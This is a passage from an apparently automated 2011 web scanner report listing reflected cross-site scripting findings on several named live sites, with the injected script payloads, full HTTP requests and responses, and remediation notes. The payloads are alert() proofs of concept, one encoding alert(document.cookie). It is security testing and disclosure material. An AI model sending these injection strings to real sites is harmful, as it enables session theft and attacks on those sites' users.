GET /content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f47ebf"%3balert(1)//9d047a6ebcf&placementid=14302119028236362& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:34 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 22:58:30 GMT ETag: "401ef4-cdb-499c241979180" Accept-Ranges: bytes Content-Length: 6140 Content-Type: application/x-javascript
The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 618f1"%3balert(1)//26cf8ec9bd2 was submitted in the placementid parameter. This input was echoed as 618f1";alert(1)//26cf8ec9bd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&placementid=14302119028236362618f1"%3balert(1)//26cf8ec9bd2& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:43 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 22:58:30 GMT ETag: "401ef4-cdb-499c241979180" Accept-Ranges: bytes Content-Length: 5804 Content-Type: application/x-javascript
4.68. http://info.bisk.com/MCIndex.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://info.bisk.com
Path: /MCIndex.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f75cf"-alert(1)-"c3877463769 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /MCIndex.asp?f75cf"-alert(1)-"c3877463769=1 HTTP/1.1 Host: info.bisk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:01:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 394 Content-Type: text/html Set-Cookie: MCIDtype=external; expires=Tue, 08-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: MCIDCookie=9505; expires=Tue, 08-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCABBARTR=EPJKGAOCFCMPMMHKGHCFKEBH; path=/ Cache-control: private
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 9f560<script>alert(1)</script>1513e10fdfb was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=769&ct=BASELINE_ROS9f560<script>alert(1)</script>1513e10fdfb&tr=INTERNAL_PAGE&num=3&layt=1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 13:21:35 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 13:21:35 GMT Content-Type: application/x-javascript Content-Length: 83
// Error: Unknown old section BASELINE_ROS9f560<script>alert(1)</script>1513e10fdfb
4.70. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jlinks.industrybrains.com
Path: /jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 13049<script>alert(1)</script>e6e2064dba1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=769&ct=BASELINE_ROS&tr=INTERNAL_PAGE&num=3&layt=1&fmt=simp&13049<script>alert(1)</script>e6e2064dba1=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 13:21:54 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 13:21:54 GMT Content-Type: application/x-javascript Content-Length: 69
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 474a3<script>alert(1)</script>94d1d0b707f was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=769&ct=BASELINE_ROS&tr=INTERNAL_PAGE474a3<script>alert(1)</script>94d1d0b707f&num=3&layt=1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 13:21:38 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 13:21:38 GMT Content-Type: application/x-javascript Content-Length: 88
// Error: Site 769 has no section INTERNAL_PAGE474a3<script>alert(1)</script>94d1d0b707f
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0c15"><script>alert(1)</script>c02b562b769 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842Dd0c15"><script>alert(1)</script>c02b562b769&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8585"><script>alert(1)</script>9328a0e8c14 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1Dd8585"><script>alert(1)</script>9328a0e8c14&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8076"><script>alert(1)</script>de432bdbd5 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffffc8076"><script>alert(1)</script>de432bdbd5&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120092
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73926"><script>alert(1)</script>490ba36911e was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec73926"><script>alert(1)</script>490ba36911e&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58dc2"><script>alert(1)</script>76eadeed398 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A58dc2"><script>alert(1)</script>76eadeed398&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f98"><script>alert(1)</script>c6a44b7ce61 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D366f98"><script>alert(1)</script>c6a44b7ce61&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81892"><script>alert(1)</script>c31d3525fe7 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F81892"><script>alert(1)</script>c31d3525fe7&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc392"><script>alert(1)</script>2a2e63ccd17 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaacc392"><script>alert(1)</script>2a2e63ccd17&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db0b1"><script>alert(1)</script>cfa7796406f was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaadb0b1"><script>alert(1)</script>cfa7796406f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
